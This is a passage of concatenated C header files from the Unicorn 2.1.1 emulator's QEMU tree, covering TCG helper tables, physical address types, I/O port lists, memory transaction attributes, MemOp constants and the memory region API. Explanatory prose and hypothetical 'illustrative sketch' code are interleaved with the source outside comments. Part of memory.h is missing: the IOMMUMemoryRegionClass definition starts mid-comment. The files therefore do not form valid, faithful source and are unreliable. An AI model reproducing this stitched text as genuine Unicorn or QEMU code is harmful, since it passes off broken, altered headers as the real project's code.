#define DEF_HELPER_FLAGS_5(NAME, FLAGS, ret, t1, t2, t3, t4, t5) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \
    | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \
    | dh_sizemask(t5, 5) },
#define DEF_HELPER_FLAGS_6(NAME, FLAGS, ret, t1, t2, t3, t4, t5, t6) \
  { .func = HELPER(NAME), .name = str(NAME), \
    .flags = FLAGS | dh_callflag(ret), \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \
    | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \
    | dh_sizemask(t5, 5) | dh_sizemask(t6, 6) },
#define DEF_HELPER_FLAGS_7(NAME, FLAGS, ret, t1, t2, t3, t4, t5, t6, t7) \
  { .func = HELPER(NAME), .name = str(NAME), .flags = FLAGS, \
    .sizemask = dh_sizemask(ret, 0) | dh_sizemask(t1, 1) \
    | dh_sizemask(t2, 2) | dh_sizemask(t3, 3) | dh_sizemask(t4, 4) \
    | dh_sizemask(t5, 5) | dh_sizemask(t6, 6) | dh_sizemask(t7, 7) },
#include "helper.h"
#include "accel/tcg/tcg-runtime.h"
#undef str
#undef DEF_HELPER_FLAGS_0
#undef DEF_HELPER_FLAGS_1
#undef DEF_HELPER_FLAGS_2
#undef DEF_HELPER_FLAGS_3
#undef DEF_HELPER_FLAGS_4
#undef DEF_HELPER_FLAGS_5
#undef DEF_HELPER_FLAGS_6
#undef DEF_HELPER_FLAGS_7
#endif /* HELPER_TCG_H */
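In this third expansion of helper.h, each declaration becomes a brace-enclosed struct initializer rather than a prototype or an emitter. A hedged sketch of how a consumer like tcg.c might collect those rows (the struct and array names here are paraphrases, not the actual tcg.c identifiers):

/* Illustrative sketch only: the initializers produced above are meant
 * to be pasted into an array, one row per helper, e.g.:
 */
typedef struct DemoHelperInfo {
    void *func;        /* the HELPER(name) function pointer */
    const char *name;  /* stringified name, used in TCG dumps */
    unsigned flags;    /* call flags such as TCG_CALL_NO_RETURN */
    unsigned sizemask; /* packed 64-bit/signedness bits per argument */
} DemoHelperInfo;

static const DemoHelperInfo demo_all_helpers[] = {
#include "helper-tcg.h" /* expands every DEF_HELPER_FLAGS_n into a row */
};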
unicorn-2.1.1/qemu/include/exec/hwaddr.h
/* Define hwaddr if it exists.  */
#ifndef HWADDR_H
#define HWADDR_H
#define HWADDR_BITS 64
/* hwaddr is the type of a physical address (its size can
   be different from 'target_ulong').
 */
typedef uint64_t hwaddr;
#define HWADDR_MAX UINT64_MAX
#define TARGET_FMT_plx "%016" PRIx64
#define HWADDR_PRId PRId64
#define HWADDR_PRIi PRIi64
#define HWADDR_PRIo PRIo64
#define HWADDR_PRIu PRIu64
#define HWADDR_PRIx PRIx64
#define HWADDR_PRIX PRIX64
#endif
unicorn-2.1.1/qemu/include/exec/ioport.h
/*
 * defines ioport related functions
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */
/**************************************************************************
 * IO ports API
 */
#ifndef IOPORT_H
#define IOPORT_H
#include "exec/memory.h"
#define MAX_IOPORTS     (64 * 1024)
#define IOPORTS_MASK    (MAX_IOPORTS - 1)
typedef struct MemoryRegionPortio {
    uint32_t offset;
    uint32_t len;
    unsigned size;
    uint32_t (*read)(void *opaque, uint32_t address);
    void (*write)(void *opaque, uint32_t address, uint32_t data);
    uint32_t base; /* private field */
} MemoryRegionPortio;
#define PORTIO_END_OF_LIST() { }
void cpu_outb(struct uc_struct *uc, uint32_t addr, uint8_t val);
void cpu_outw(struct uc_struct *uc, uint32_t addr, uint16_t val);
void cpu_outl(struct uc_struct *uc, uint32_t addr, uint32_t val);
uint8_t cpu_inb(struct uc_struct *uc, uint32_t addr);
uint16_t cpu_inw(struct uc_struct *uc, uint32_t addr);
uint32_t cpu_inl(struct uc_struct *uc, uint32_t addr);
typedef struct PortioList {
    const struct MemoryRegionPortio *ports;
    struct MemoryRegion *address_space;
    unsigned nr;
    struct MemoryRegion **regions;
    void *opaque;
    const char *name;
} PortioList;
void portio_list_init(PortioList *piolist, const struct MemoryRegionPortio *callbacks, void *opaque, const char *name);
void portio_list_destroy(PortioList *piolist);
void portio_list_add(PortioList *piolist, struct MemoryRegion *address_space, uint32_t addr);
void portio_list_del(PortioList *piolist);
#endif /* IOPORT_H */
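The MemoryRegionPortio table plus PortioList pair is how a device describes a cluster of legacy I/O ports at once. A hedged sketch of the expected shape, with a hypothetical two-port device (the device, callbacks, and base port 0x510 are all assumptions for illustration):

/* Illustrative sketch only: a hypothetical 2-port device. Each table
 * row is { offset, len, size, .read, .write }; the terminator is an
 * empty entry from PORTIO_END_OF_LIST().
 */
static uint32_t demo_io_read(void *opaque, uint32_t addr)
{
    return 0xff; /* hypothetical: nothing to report */
}

static void demo_io_write(void *opaque, uint32_t addr, uint32_t data)
{
    /* hypothetical: consume the byte */
}

static const MemoryRegionPortio demo_portio[] = {
    { 0, 2, 1, .read = demo_io_read, .write = demo_io_write },
    PORTIO_END_OF_LIST(),
};

/* Registration would then look roughly like:
 *   portio_list_init(&piolist, demo_portio, opaque, "demo");
 *   portio_list_add(&piolist, io_address_space_root, 0x510);
 */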
unicorn-2.1.1/qemu/include/exec/memattrs.h
/*
 * Memory transaction attributes
 *
 * Copyright (c) 2015 Linaro Limited.
 *
 * Authors:
 *  Peter Maydell <peter.maydell@linaro.org>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 *
 */
#ifndef MEMATTRS_H
#define MEMATTRS_H
/* Every memory transaction has associated with it a set of
 * attributes. Some of these are generic (such as the ID of
 * the bus master); some are specific to a particular kind of
 * bus (such as the ARM Secure/NonSecure bit). We define them
 * all as non-overlapping bitfields in a single struct to avoid
 * confusion if different parts of QEMU used the same bit for
 * different semantics.
 */
typedef struct MemTxAttrs {
    /* Bus masters which don't specify any attributes will get this
     * (via the MEMTXATTRS_UNSPECIFIED constant), so that we can
     * distinguish "all attributes deliberately clear" from
     * "didn't specify" if necessary.
     */
    unsigned int unspecified:1;
    /* ARM/AMBA: TrustZone Secure access
     * x86: System Management Mode access
     */
    unsigned int secure:1;
    /* Memory access is usermode (unprivileged) */
    unsigned int user:1;
    /* Requester ID (for MSI for example) */
    unsigned int requester_id:16;
    /* Invert endianness for this page */
    unsigned int byte_swap:1;
    /*
     * The following are target-specific page-table bits.  These are not
     * related to actual memory transactions at all.  However, this structure
     * is part of the tlb_fill interface, cached in the cputlb structure,
     * and has unused bits.  These fields will be read by target-specific
     * helpers using env->iotlb[mmu_idx][tlb_index()].attrs.target_tlb_bitN.
     */
    unsigned int target_tlb_bit0 : 1;
    unsigned int target_tlb_bit1 : 1;
    unsigned int target_tlb_bit2 : 1;
} MemTxAttrs;
/* Bus masters which don't specify any attributes will get this,
 * which has all attribute bits clear except the topmost one
 * (so that we can distinguish "all attributes deliberately clear"
 * from "didn't specify" if necessary).
 */
#define MEMTXATTRS_UNSPECIFIED ((MemTxAttrs) { .unspecified = 1 })
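Device models inspect these attributes to implement access control, using the MemTx result codes defined just below. A hedged sketch of a hypothetical read_with_attrs callback (the register, device, and policy are assumptions; the callback signature matches the one declared in memory.h in this tree):

/* Illustrative sketch only: a hypothetical MMIO read callback that
 * rejects unprivileged or non-secure accesses to a secure-only register.
 */
static MemTxResult demo_reg_read(struct uc_struct *uc, void *opaque,
                                 hwaddr addr, uint64_t *data,
                                 unsigned size, MemTxAttrs attrs)
{
    if (!attrs.unspecified && (attrs.user || !attrs.secure)) {
        return MEMTX_ERROR; /* not a privileged secure access */
    }
    *data = 0; /* hypothetical register value */
    return MEMTX_OK;
}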
/* New-style MMIO accessors can indicate that the transaction failed.
 * A zero (MEMTX_OK) response means success; anything else is a failure
 * of some kind. The memory subsystem will bitwise-OR together results
 * if it is synthesizing an operation from multiple smaller accesses.
 */
#define MEMTX_OK 0
#define MEMTX_ERROR             (1U << 0) /* device returned an error */
#define MEMTX_DECODE_ERROR      (1U << 1) /* nothing at that address */
typedef uint32_t MemTxResult;
#endif
unicorn-2.1.1/qemu/include/exec/memop.h
/*
 * Constants for memory operations
 *
 * Authors:
 *  Richard Henderson <rth@twiddle.net>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 *
 */
#ifndef MEMOP_H
#define MEMOP_H
#include "qemu/host-utils.h"
typedef enum MemOp {
    MO_8     = 0,
    MO_16    = 1,
    MO_32    = 2,
    MO_64    = 3,
    MO_SIZE  = 3,   /* Mask for the above.  */
    MO_SIGN  = 4,   /* Sign-extended, otherwise zero-extended.  */
    MO_BSWAP = 8,   /* Host reverse endian.  */
#ifdef HOST_WORDS_BIGENDIAN
    MO_LE    = MO_BSWAP,
    MO_BE    = 0,
#else
    MO_LE    = 0,
    MO_BE    = MO_BSWAP,
#endif
#ifdef NEED_CPU_H
#ifdef TARGET_WORDS_BIGENDIAN
    MO_TE    = MO_BE,
#else
    MO_TE    = MO_LE,
#endif
#endif
    /*
     * MO_UNALN accesses are never checked for alignment.
     * MO_ALIGN accesses will result in a call to the CPU's
     * do_unaligned_access hook if the guest address is not aligned.
     * The default depends on whether the target CPU defines
     * TARGET_ALIGNED_ONLY.
     *
     * Some architectures (e.g. ARMv8) need the address which is aligned
     * to a size more than the size of the memory access.
     * Some architectures (e.g. SPARCv9) need an address which is aligned,
     * but less strictly than the natural alignment.
     *
     * MO_ALIGN supposes the alignment size is the size of a memory access.
     *
     * There are three options:
     * - unaligned access permitted (MO_UNALN).
     * - an alignment to the size of an access (MO_ALIGN);
     * - an alignment to a specified size, which may be more or less than
     *   the access size (MO_ALIGN_x where 'x' is a size in bytes);
     */
    MO_ASHIFT = 4,
    MO_AMASK = 7 << MO_ASHIFT,
#ifdef NEED_CPU_H
#ifdef TARGET_ALIGNED_ONLY
    MO_ALIGN = 0,
    MO_UNALN = MO_AMASK,
#else
    MO_ALIGN = MO_AMASK,
    MO_UNALN = 0,
#endif
#endif
    MO_ALIGN_2  = 1 << MO_ASHIFT,
    MO_ALIGN_4  = 2 << MO_ASHIFT,
    MO_ALIGN_8  = 3 << MO_ASHIFT,
    MO_ALIGN_16 = 4 << MO_ASHIFT,
    MO_ALIGN_32 = 5 << MO_ASHIFT,
    MO_ALIGN_64 = 6 << MO_ASHIFT,
    /* Combinations of the above, for ease of use.
     */
    MO_UB    = MO_8,
    MO_UW    = MO_16,
    MO_UL    = MO_32,
    MO_SB    = MO_SIGN | MO_8,
    MO_SW    = MO_SIGN | MO_16,
    MO_SL    = MO_SIGN | MO_32,
    MO_Q     = MO_64,
    MO_LEUW  = MO_LE | MO_UW,
    MO_LEUL  = MO_LE | MO_UL,
    MO_LESW  = MO_LE | MO_SW,
    MO_LESL  = MO_LE | MO_SL,
    MO_LEQ   = MO_LE | MO_Q,
    MO_BEUW  = MO_BE | MO_UW,
    MO_BEUL  = MO_BE | MO_UL,
    MO_BESW  = MO_BE | MO_SW,
    MO_BESL  = MO_BE | MO_SL,
    MO_BEQ   = MO_BE | MO_Q,
#ifdef NEED_CPU_H
    MO_TEUW  = MO_TE | MO_UW,
    MO_TEUL  = MO_TE | MO_UL,
    MO_TESW  = MO_TE | MO_SW,
    MO_TESL  = MO_TE | MO_SL,
    MO_TEQ   = MO_TE | MO_Q,
#endif
    MO_SSIZE = MO_SIZE | MO_SIGN,
} MemOp;
/* MemOp to size in bytes.  */
static inline unsigned memop_size(MemOp op)
{
    return 1 << (op & MO_SIZE);
}
/* Size in bytes to MemOp.  */
static inline MemOp size_memop(unsigned size)
{
#ifdef CONFIG_DEBUG_TCG
    /* Power of 2 up to 8.  */
    assert((size & (size - 1)) == 0 && size >= 1 && size <= 8);
#endif
    return ctz32(size);
}
/* Big endianness from MemOp.  */
static inline bool memop_big_endian(MemOp op)
{
    return (op & MO_BSWAP) == MO_BE;
}
#endif
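Since a MemOp is just a bitfield of size, signedness, endianness, and alignment, composing and decomposing one is plain bit arithmetic. A small self-contained sketch:

/* Illustrative sketch only: round-tripping a 32-bit little-endian
 * access descriptor through the helpers above.
 */
static inline void demo_memop(void)
{
    MemOp op = MO_LEUL;                      /* 32-bit, little-endian */
    unsigned nbytes = memop_size(op);        /* 1 << MO_32 == 4 */
    MemOp back = size_memop(nbytes) | MO_LE; /* reconstructs MO_LEUL */
    (void)back;
    (void)nbytes;
}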
unicorn-2.1.1/qemu/include/exec/memory-internal.h
/*
 * Declarations for functions which are internal to the memory subsystem.
 *
 * Copyright 2011 Red Hat, Inc. and/or its affiliates
 *
 * Authors:
 *  Avi Kivity <avi@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or
 * later.  See the COPYING file in the top-level directory.
 *
 */
/*
 * This header is for use by exec.c, memory.c and accel/tcg/cputlb.c ONLY,
 * for declarations which are shared between the memory subsystem's
 * internals and the TCG TLB code.  Do not include it from elsewhere.
 */
#ifndef MEMORY_INTERNAL_H
#define MEMORY_INTERNAL_H
#include "cpu.h"
static inline AddressSpaceDispatch *flatview_to_dispatch(FlatView *fv)
{
    return fv->dispatch;
}
static inline AddressSpaceDispatch *address_space_to_dispatch(AddressSpace *as)
{
    return flatview_to_dispatch(address_space_to_flatview(as));
}
FlatView *address_space_get_flatview(AddressSpace *as);
void flatview_unref(FlatView *view);
extern const MemoryRegionOps unassigned_mem_ops;
bool memory_region_access_valid(struct uc_struct *uc, MemoryRegion *mr, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs);
void flatview_add_to_dispatch(struct uc_struct *uc, FlatView *fv, MemoryRegionSection *section);
AddressSpaceDispatch *address_space_dispatch_new(struct uc_struct *uc, FlatView *fv);
void address_space_dispatch_compact(AddressSpaceDispatch *d);
void address_space_dispatch_free(AddressSpaceDispatch *d);
void mtree_print_dispatch(struct AddressSpaceDispatch *d, MemoryRegion *root);
#endif
unicorn-2.1.1/qemu/include/exec/memory.h
/*
 * Physical memory management API
 *
 * Copyright 2011 Red Hat, Inc. and/or its affiliates
 *
 * Authors:
 *  Avi Kivity <avi@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2.  See
 * the COPYING file in the top-level directory.
 *
 */
#ifndef MEMORY_H
#define MEMORY_H
#include "exec/cpu-common.h"
#include "exec/hwaddr.h"
#include "exec/memattrs.h"
#include "exec/memop.h"
#include "exec/ramlist.h"
#include "qemu/bswap.h"
#include "qemu/queue.h"
#include "qemu/int128.h"
#define RAM_ADDR_INVALID (~(ram_addr_t)0)
#define MAX_PHYS_ADDR_SPACE_BITS 62
#define MAX_PHYS_ADDR (((hwaddr)1 << MAX_PHYS_ADDR_SPACE_BITS) - 1)
typedef struct MemoryRegionOps MemoryRegionOps;
typedef struct IOMMUTLBEntry IOMMUTLBEntry;
typedef uint64_t (*uc_cb_mmio_read_t)(struct uc_struct *uc, uint64_t addr, unsigned size, void *user_data);
typedef void (*uc_cb_mmio_write_t)(struct uc_struct *uc, uint64_t addr, unsigned size, uint64_t data, void *user_data);
/* See address_space_translate: bit 0 is read, bit 1 is write.  */
typedef enum {
    IOMMU_NONE = 0,
    IOMMU_RO   = 1,
    IOMMU_WO   = 2,
    IOMMU_RW   = 3,
} IOMMUAccessFlags;
#define IOMMU_ACCESS_FLAG(r, w) (((r) ? IOMMU_RO : 0) | ((w) ? IOMMU_WO : 0))
struct IOMMUTLBEntry {
    AddressSpace    *target_as;
    hwaddr           iova;
    hwaddr           translated_addr;
    hwaddr           addr_mask;  /* 0xfff = 4k translation */
    IOMMUAccessFlags perm;
};
/*
 * Bitmap for different IOMMUNotifier capabilities. Each notifier can
 * register with one or multiple IOMMU Notifier capability bit(s).
*/ typedef enum { IOMMU_NOTIFIER_NONE = 0, /* Notify cache invalidations */ IOMMU_NOTIFIER_UNMAP = 0x1, /* Notify entry changes (newly created entries) */ IOMMU_NOTIFIER_MAP = 0x2, } IOMMUNotifierFlag; #define IOMMU_NOTIFIER_ALL (IOMMU_NOTIFIER_MAP | IOMMU_NOTIFIER_UNMAP) struct IOMMUNotifier; typedef void (*IOMMUNotify)(struct IOMMUNotifier *notifier, IOMMUTLBEntry *data); struct IOMMUNotifier { IOMMUNotify notify; IOMMUNotifierFlag notifier_flags; /* Notify for address space range start <= addr <= end */ hwaddr start; hwaddr end; int iommu_idx; QLIST_ENTRY(IOMMUNotifier) node; }; typedef struct IOMMUNotifier IOMMUNotifier; /* RAM is pre-allocated and passed into qemu_ram_alloc_from_ptr */ #define RAM_PREALLOC (1 << 0) /* RAM is mmap-ed with MAP_SHARED */ #define RAM_SHARED (1 << 1) /* Only a portion of RAM (used_length) is actually used, and migrated. * This used_length size can change across reboots. */ #define RAM_RESIZEABLE (1 << 2) /* UFFDIO_ZEROPAGE is available on this RAMBlock to atomically * zero the page and wake waiting processes. * (Set during postcopy) */ #define RAM_UF_ZEROPAGE (1 << 3) /* RAM can be migrated */ #define RAM_MIGRATABLE (1 << 4) /* RAM is a persistent kind memory */ #define RAM_PMEM (1 << 5) static inline void iommu_notifier_init(IOMMUNotifier *n, IOMMUNotify fn, IOMMUNotifierFlag flags, hwaddr start, hwaddr end, int iommu_idx) { n->notify = fn; n->notifier_flags = flags; n->start = start; n->end = end; n->iommu_idx = iommu_idx; } /* * Memory region callbacks */ struct MemoryRegionOps { /* Read from the memory region. @addr is relative to @mr; @size is * in bytes. */ uint64_t (*read)(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size); /* Write to the memory region. @addr is relative to @mr; @size is * in bytes. */ void (*write)(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t data, unsigned size); MemTxResult (*read_with_attrs)(struct uc_struct *uc, void *opaque, hwaddr addr, uint64_t *data, unsigned size, MemTxAttrs attrs); MemTxResult (*write_with_attrs)(struct uc_struct *, void *opaque, hwaddr addr, uint64_t data, unsigned size, MemTxAttrs attrs); enum device_endian endianness; /* Guest-visible constraints: */ struct { /* If nonzero, specify bounds on access sizes beyond which a machine * check is thrown. */ unsigned min_access_size; unsigned max_access_size; /* If true, unaligned accesses are supported. Otherwise unaligned * accesses throw machine checks. */ bool unaligned; /* * If present, and returns #false, the transaction is not accepted * by the device (and results in machine dependent behaviour such * as a machine check exception). */ bool (*accepts)(struct uc_struct *uc, void *opaque, hwaddr addr, unsigned size, bool is_write, MemTxAttrs attrs); } valid; /* Internal implementation constraints: */ struct { /* If nonzero, specifies the minimum size implemented. Smaller sizes * will be rounded upwards and a partial result will be returned. */ unsigned min_access_size; /* If nonzero, specifies the maximum size implemented. Larger sizes * will be done as a series of accesses with smaller sizes. */ unsigned max_access_size; /* If true, unaligned accesses are supported. Otherwise all accesses * are converted to (possibly multiple) naturally aligned accesses. 
 */
        bool unaligned;
    } impl;
};
enum IOMMUMemoryRegionAttr {
    IOMMU_ATTR_SPAPR_TCE_FD
};
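MemoryRegionOps, defined just above, is the main extension point for MMIO: a device supplies read/write callbacks plus validity constraints, and the memory core dispatches accesses through them. A hedged sketch of a minimal ops table (the device, its callbacks, and DEVICE_NATIVE_ENDIAN are assumptions for illustration; the callback signatures follow the struct as declared in this header):

/* Illustrative sketch only: a hypothetical MMIO region that reads as
 * zero and ignores writes.
 */
static uint64_t demo_mmio_read(struct uc_struct *uc, void *opaque,
                               hwaddr addr, unsigned size)
{
    return 0; /* hypothetical device: reads as zero */
}

static void demo_mmio_write(struct uc_struct *uc, void *opaque,
                            hwaddr addr, uint64_t data, unsigned size)
{
    /* hypothetical device: writes are ignored */
}

static const MemoryRegionOps demo_mmio_ops = {
    .read = demo_mmio_read,
    .write = demo_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN, /* assumed enum device_endian value */
    .valid.min_access_size = 1,
    .valid.max_access_size = 8,
};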
     *
     * @iommu: the IOMMUMemoryRegion
     * @attr: attribute being queried
     * @data: memory to fill in with the attribute data
     *
     * Returns 0 on success, or a negative errno; in particular
     * returns -EINVAL for unrecognized or unimplemented attribute types.
     */
    int (*get_attr)(IOMMUMemoryRegion *iommu, enum IOMMUMemoryRegionAttr attr,
                    void *data);

    /* Return the IOMMU index to use for a given set of transaction attributes.
     *
     * Optional method: if an IOMMU only supports a single IOMMU index then
     * the default implementation of memory_region_iommu_attrs_to_index()
     * will return 0.
     *
     * The indexes supported by an IOMMU must be contiguous, starting at 0.
     *
     * @iommu: the IOMMUMemoryRegion
     * @attrs: memory transaction attributes
     */
    int (*attrs_to_index)(IOMMUMemoryRegion *iommu, MemTxAttrs attrs);

    /* Return the number of IOMMU indexes this IOMMU supports.
     *
     * Optional method: if this method is not provided, then
     * memory_region_iommu_num_indexes() will return 1, indicating that
     * only a single IOMMU index is supported.
     *
     * @iommu: the IOMMUMemoryRegion
     */
    int (*num_indexes)(IOMMUMemoryRegion *iommu);
} IOMMUMemoryRegionClass;

/** MemoryRegion:
 *
 * A struct representing a memory region.
 */
struct MemoryRegion {
    /* private: */

    /* The following fields should fit in a cache line */
    bool ram;
    bool subpage;
    bool readonly; /* For RAM regions */
    bool is_iommu;
    RAMBlock *ram_block;

    const MemoryRegionOps *ops;
    void *opaque;
    MemoryRegion *container;
    Int128 size;
    hwaddr addr;
    void (*destructor)(MemoryRegion *mr);
    uint64_t align;
    bool terminates;
    bool enabled;
    int32_t priority;
    QTAILQ_HEAD(, MemoryRegion) subregions;
    QTAILQ_ENTRY(MemoryRegion) subregions_link;
    struct uc_struct *uc;
    uint32_t perms;
    hwaddr end;
};

struct IOMMUMemoryRegion {
    MemoryRegion parent_obj;

    QLIST_HEAD(, IOMMUNotifier) iommu_notify;
    IOMMUNotifierFlag iommu_notify_flags;
    IOMMUMemoryRegionClass cc;
};

#define MEMORY_REGION(obj) ((MemoryRegion *)obj)
#define IOMMU_MEMORY_REGION(obj) ((IOMMUMemoryRegion *)obj)
#define IOMMU_MEMORY_REGION_CLASS(klass) ((IOMMUMemoryRegionClass *)klass)
#define IOMMU_MEMORY_REGION_GET_CLASS(obj) (&((IOMMUMemoryRegion *)obj)->cc)

#define IOMMU_NOTIFIER_FOREACH(n, mr) \
    QLIST_FOREACH((n), &(mr)->iommu_notify, node)

/**
 * MemoryListener: callbacks structure for updates to the physical memory map
 *
 * Allows a component to adjust to changes in the guest-visible memory map.
 * Use with memory_listener_register() and memory_listener_unregister().
 */
struct MemoryListener {
    /**
     * @begin:
     *
     * Called at the beginning of an address space update transaction.
     * Followed by calls to #MemoryListener.region_add(),
     * #MemoryListener.region_del(), #MemoryListener.region_nop(),
     * #MemoryListener.log_start() and #MemoryListener.log_stop() in
     * increasing address order.
     *
     * @listener: The #MemoryListener.
     */
    void (*begin)(MemoryListener *listener);

    /**
     * @commit:
     *
     * Called at the end of an address space update transaction,
     * after the last call to #MemoryListener.region_add(),
     * #MemoryListener.region_del() or #MemoryListener.region_nop(),
     * #MemoryListener.log_start() and #MemoryListener.log_stop().
     *
     * @listener: The #MemoryListener.
     */
    void (*commit)(MemoryListener *listener);

    /**
     * @region_add:
     *
     * Called during an address space update transaction,
     * for a section of the address space that is new in this address
     * space since the last transaction.
     *
     * @listener: The #MemoryListener.
     * @section: The new #MemoryRegionSection.
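     *
     * As an illustrative sketch (an editorial example with hypothetical
     * my_* names, not part of the original header), a component could
     * observe newly added sections like this:
     *
     *   static void my_region_add(MemoryListener *listener,
     *                             MemoryRegionSection *section)
     *   {
     *       (void)section;    <-- react to the new section here
     *   }
     *
     *   static MemoryListener my_listener = {
     *       .region_add = my_region_add,
     *   };
     *
     *   memory_listener_register(&my_listener, as);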
*/ void (*region_add)(MemoryListener *listener, MemoryRegionSection *section); /** * @region_del: * * Called during an address space update transaction, * for a section of the address space that has disappeared in the address * space since the last transaction. * * @listener: The #MemoryListener. * @section: The old #MemoryRegionSection. */ void (*region_del)(MemoryListener *listener, MemoryRegionSection *section); /** * @region_nop: * * Called during an address space update transaction, * for a section of the address space that is in the same place in the address * space as in the last transaction. * * @listener: The #MemoryListener. * @section: The #MemoryRegionSection. */ void (*region_nop)(MemoryListener *listener, MemoryRegionSection *section); /* private: */ AddressSpace *address_space; QTAILQ_ENTRY(MemoryListener) link; QTAILQ_ENTRY(MemoryListener) link_as; }; /** * AddressSpace: describes a mapping of addresses to #MemoryRegion objects */ struct AddressSpace { /* private: */ MemoryRegion *root; /* Accessed via RCU. */ struct FlatView *current_map; QTAILQ_HEAD(, MemoryListener) listeners; QTAILQ_ENTRY(AddressSpace) address_spaces_link; struct uc_struct *uc; }; typedef struct AddressSpaceDispatch AddressSpaceDispatch; typedef struct FlatRange FlatRange; /* Flattened global view of current active memory hierarchy. Kept in sorted * order. */ struct FlatView { unsigned ref; FlatRange *ranges; unsigned nr; unsigned nr_allocated; struct AddressSpaceDispatch *dispatch; MemoryRegion *root; }; static inline FlatView *address_space_to_flatview(AddressSpace *as) { return as->current_map; } /** * MemoryRegionSection: describes a fragment of a #MemoryRegion * * @mr: the region, or %NULL if empty * @fv: the flat view of the address space the region is mapped in * @offset_within_region: the beginning of the section, relative to @mr's start * @size: the size of the section; will not exceed @mr's boundaries * @offset_within_address_space: the address of the first byte of the section * relative to the region's address space * @readonly: writes to this section are ignored */ struct MemoryRegionSection { Int128 size; MemoryRegion *mr; FlatView *fv; hwaddr offset_within_region; hwaddr offset_within_address_space; bool readonly; }; static inline bool MemoryRegionSection_eq(MemoryRegionSection *a, MemoryRegionSection *b) { return a->mr == b->mr && a->fv == b->fv && a->offset_within_region == b->offset_within_region && a->offset_within_address_space == b->offset_within_address_space && int128_eq(a->size, b->size) && a->readonly == b->readonly; } /** * memory_region_init: Initialize a memory region * * The region typically acts as a container for other memory regions. Use * memory_region_add_subregion() to add subregions. * * @mr: the #MemoryRegion to be initialized * @size: size of the region; any subregions beyond this size will be clipped */ void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, uint64_t size); /** * memory_region_ref: Add 1 to a memory region's reference count * * Whenever memory regions are accessed outside the BQL, they need to be * preserved against hot-unplug. MemoryRegions actually do not have their * own reference count; they piggyback on a QOM object, their "owner". * This function adds a reference to the owner. * * All MemoryRegions must have an owner if they can disappear, even if the * device they belong to operates exclusively under the BQL. This is because * the region could be returned at any time by memory_region_find, and this * is usually under guest control. 
 *
 * @mr: the #MemoryRegion
 */
void memory_region_ref(MemoryRegion *mr);

/**
 * memory_region_init_io: Initialize an I/O memory region.
 *
 * Accesses into the region will cause the callbacks in @ops to be called.
 * If @size is nonzero, subregions will be clipped to @size.
 *
 * @mr: the #MemoryRegion to be initialized.
 * @ops: a structure containing read and write callbacks to be used when
 *       I/O is performed on the region.
 * @opaque: passed to the read and write callbacks of the @ops structure.
 * @size: size of the region.
 */
void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr,
                           const MemoryRegionOps *ops,
                           void *opaque,
                           uint64_t size);

/**
 * memory_region_init_ram_ptr:  Initialize RAM memory region from a
 *                              user-provided pointer.  Accesses into the
 *                              region will modify memory directly.
 *
 * @mr: the #MemoryRegion to be initialized.
 * @size: size of the region.
 * @ptr: memory to be mapped; must contain at least @size bytes.
 *
 * Note that this function does not do anything to cause the data in the
 * RAM memory region to be migrated; that is the responsibility of the caller.
 */
void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr,
                                uint64_t size,
                                void *ptr);

/**
 * memory_region_init_ram - Initialize RAM memory region.  Accesses into the
 *                          region will modify memory directly.
 *
 * @mr: the #MemoryRegion to be initialized
 * @size: size of the region in bytes
 * @perms: access permissions for the region
 *
 * This function allocates RAM for the region and initializes it.
 */
void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr,
                            uint64_t size, uint32_t perms);

/**
 * memory_region_size: get a memory region's size.
 *
 * @mr: the memory region being queried.
 */
uint64_t memory_region_size(MemoryRegion *mr);

/**
 * memory_region_is_ram: check whether a memory region is random access
 *
 * Returns %true if a memory region is random access.
 *
 * @mr: the memory region being queried
 */
static inline bool memory_region_is_ram(MemoryRegion *mr)
{
    return mr->ram;
}

/**
 * memory_region_get_iommu: check whether a memory region is an iommu
 *
 * Returns pointer to IOMMUMemoryRegion if a memory region is an iommu,
 * otherwise NULL.
 *
 * @mr: the memory region being queried
 */
static inline IOMMUMemoryRegion *memory_region_get_iommu(MemoryRegion *mr)
{
    if (mr->is_iommu) {
        return (IOMMUMemoryRegion *) mr;
    }
    return NULL;
}

/**
 * memory_region_get_iommu_class_nocheck: returns iommu memory region class
 *   if an iommu or NULL if not
 *
 * Returns pointer to IOMMUMemoryRegionClass if a memory region is an iommu,
 * otherwise NULL. This is fast path avoiding QOM checking, use with caution.
 *
 * @iommu_mr: the memory region being queried
 */
static inline IOMMUMemoryRegionClass *memory_region_get_iommu_class_nocheck(
    IOMMUMemoryRegion *iommu_mr)
{
    return &iommu_mr->cc;
}

/**
 * memory_region_from_host: Convert a pointer into a RAM memory region
 * and an offset within it.
 *
 * Given a host pointer inside a RAM memory region (created with
 * memory_region_init_ram() or memory_region_init_ram_ptr()), return
 * the MemoryRegion and the offset within it.
 *
 * Use with care; by the time this function returns, the returned pointer is
 * not protected by RCU anymore.  If the caller is not within an RCU critical
 * section and does not hold the iothread lock, it must have other means of
 * protecting the pointer, such as a reference to the region that includes
 * the incoming ram_addr_t.
 *
 * @ptr: the host pointer to be converted
